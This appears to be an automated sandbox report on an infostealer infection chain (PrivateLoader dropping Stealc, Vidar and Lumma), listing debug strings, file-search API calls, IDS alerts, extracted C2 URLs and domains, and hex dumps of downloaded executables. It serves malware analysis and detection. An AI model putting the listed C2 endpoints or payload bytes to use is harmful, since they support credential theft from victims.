                            Source: Binary string: mscorlib.pdb source: LKMService.exe, 00000017.00000002.2505868036.0000000007A30000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: mscorlib.pdb-b source: GoogleUpdater.exe, 00000012.00000002.2373356636.000000000110C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: LKSM.pdbt source: file.exe, 00000000.00000002.2124493240.0000000002C90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb5 source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Core.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.000000000110C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.dr
                            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000014.00000002.3239362051.0000000005D4B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3477129687.000000002299B000.00000002.00001000.00020000.00000000.sdmp
                            Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbQ source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Yara detected PrivateLoader
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 364, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeDirectory queried: number of queries: 1001
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0053FAB6 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,6_2_0053FAB6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,19_2_0040E430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_00414910
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,19_2_0040BE70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_004016D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_0040DA80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_00413EA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,19_2_0040F6B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,19_2_004138B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,19_2_00414570
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,19_2_0040ED20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,19_2_0040DE10
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdaterJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:58515 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:58515 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:58515
                            Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:58515 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:58515
                            Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:58515 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:58580 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:58580 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:58580
                            Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:58580 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:58580
                            Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:58584 -> 45.132.206.251:80
                            Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:58580 -> 46.8.231.109:80
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58526 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58526 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58521 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58521 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:58532 -> 49.12.197.9:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58538 -> 104.21.17.174:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58538 -> 104.21.17.174:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58543 -> 104.21.16.12:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58543 -> 104.21.16.12:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58530 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58530 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:58535
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58533 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58533 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58536 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58536 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:58539
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58524 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58524 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58575 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58575 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58577 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58577 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58576 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58576 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58579 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58579 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58595 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58595 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58573 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58582 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58582 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58573 -> 172.67.208.141:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58599 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58599 -> 188.114.97.3:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58583 -> 104.21.17.174:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58583 -> 104.21.17.174:443
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:58594
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:58592
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58600 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58600 -> 104.21.56.150:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58601 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58601 -> 172.67.184.196:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58605 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58605 -> 104.21.18.193:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58607 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58607 -> 172.67.195.67:443
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:58629
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:58632
                            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.6:58628
                            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.6:58633
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58617 -> 104.21.16.12:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58617 -> 104.21.16.12:443
                            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:58611 -> 104.21.17.174:443
                            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:58611 -> 104.21.17.174:443
                            Yara detected PrivateLoader
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 364, type: MEMORYSTR
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: http://46.8.231.109/c4754d4f680ead72.php
                            Source: Malware configuration extractorURLs: snarlypagowo.site
                            Source: Malware configuration extractorURLs: absorptioniw.site
                            Source: Malware configuration extractorURLs: mysterisop.site
                            Source: Malware configuration extractorURLs: chorusarorp.site
                            Source: Malware configuration extractorURLs: soldiefieop.site
                            Source: Malware configuration extractorURLs: questionsmw.stor
                            Source: Malware configuration extractorURLs: abnomalrkmu.site
                            Source: Malware configuration extractorURLs: treatynreit.site
                            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 12:42:48 GMTContent-Type: application/octet-streamContent-Length: 1964072Last-Modified: Mon, 30 Sep 2024 22:24:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fb252f-1df828"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 87 24 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c8 1d 00 00 08 00 00 00 00 00 00 3e e6 1d 00 00 20 00 00 00 00 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 1e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec e5 1d 00 4f 00 00 00 00 00 1e 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 d2 1d 00 28 26 00 00 00 20 1e 00 0c 00 00 00 b4 e4 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 c6 1d 00 00 20 00 00 00 c8 1d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 00 1e 00 00 06 00 00 00 ca 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 1e 00 00 02 00 00 00 d0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 e6 1d 00 00 00 00 00 48 00 00 00 02 00 05 00 20 d3 1d 00 94 11 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 db 4b db 0d 86 8a ff 21 aa 90 f7 e4 f3 c0 22 68 88 c6 26 4e 4a 24 82 f0 6d aa 55 4f f2 c0 10 c9 a6 6a d8 53 91 f0 9b c1 a6 75 a7 0f eb 0d bf e9 d4 fb a1 59 46 03 e8 d5 7b 41 59 7f f8 76 fb 35 3a 23 49 c5 84 bc ea a0 35 18 ad 2c 4a e2 0b 37 2b 2e ba ab 3a 78 4a 26 f9 6d 29 2f 99 80 75 a4 d8 54 6a ec 3d 84 12 8a b1 cb 62 55 bc 16 2f 45 37 cf 94 1b ca a6 3f 19 8a 5f b7 47 5c c4 d3 ed d8 82 9b f8 7a a4 ae 12 ce 64 bb 7b 95 81 97 85 fc 19 24 43 3d 7c 9c 4e 65 f7 2c 4d 34 5f 86 3f 5e 39 65 db db 00 b5 19 40 98 95 ed c1 b7 46 64 38 fa c5 d6 cc bb 7f b7 1f 3a 02 d0 a4 9c b0 db cb c6 9e cd 93 9f d9 2d 5a 94 4e c5 c7 96 bf df a7 ce a3 b6 14 4a b2 2a bb 34 2a f9 48 d9 93 ce fe 90 07 99 44 1e 18 a1 5d b1 b5 30 b1 de 2b cf 1b ba 5b fd 68 6b 5a a6 d9 1f 4b 97 68 52 3c 32 44 43 1d fa 2b fd e0 ab 3d fd f6 7e 69 4e 59 2b ae 91 70 79 14 d7 af d3 a4 e7 ac 2c 35 97 12 62 25 0e ff 30 e3 96 ba c4 04 0a ef f5 98
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 12:43:01 GMTContent-Type: application/octet-streamContent-Length: 423840Last-Modified: Tue, 01 Oct 2024 13:44:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfccd-677a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 1e 06 00 00 20 00 00 00 20 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 06 00 00 04 00 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3e 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 2b 06 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 2c d1 93 c8 4a 65 ad 38 b7 18 2a c6 c0 85 02 b3 e5 ca 58 66 dc e9 33 f5 0c 5a 6d 97 10 f4 76 07 24 3a be 9f dc 72 84 b7 89 d0 ea 1f 58 f2 1e 82 4d be cd 36 27 34 b2 db b6 2c ab 4f 97 54 df 13 fc 21 b2 07 42 0c da bf 43 98 7c f4 98 0d 9b 5b 05 7b 32 ae 79 e2 92 81 64 3f 31 64 32 a6 6d b5 be 84 92 cf 08 fd 55 35 41 39 fb 33 f1 42 dd 5b 6c d7 74 a6 a7 50 33 66 c5 41 2a 90 79 fb 7a 24 fd 5b 59 69 7f 06 96 ca 88 08 ca e7 11 99 a0 c1 f5 f4 5b e1 e1 76 ea 11 5c b7 1a 42 71 a1 ef 67 11 5e e9 91 ee f9 02 88 70 64 92 93 db 8c c5 7b 04 9f b0 92 74 05 7d e5 79 2a b4 e8 af 5b 50 c8 04 dc 0a 76 07 79 1e 48 07 20 ac e5 40 e7 27 32 e8 5e ab f8 34 dc 68 be b8 37 21 d4 b6 4f 80 77 d5 bc 4a 78 b5 ab 1d 69 e3 9e a4 e8 1a ab 76 a8 14 de b5 3f a1 47 d7 a4 36 5e e7 f9 05 60 ff 71 38 da c2 4e 5a b5 ab 2d 97 54 9a bf 96 75 ef 9a d0 92 f2 57 31 7a 1e 8b a0 fc 01 4b c7 b6 81 5f 9c c1 90 2a ff 16 37 1b 2d cb 1b a1 4
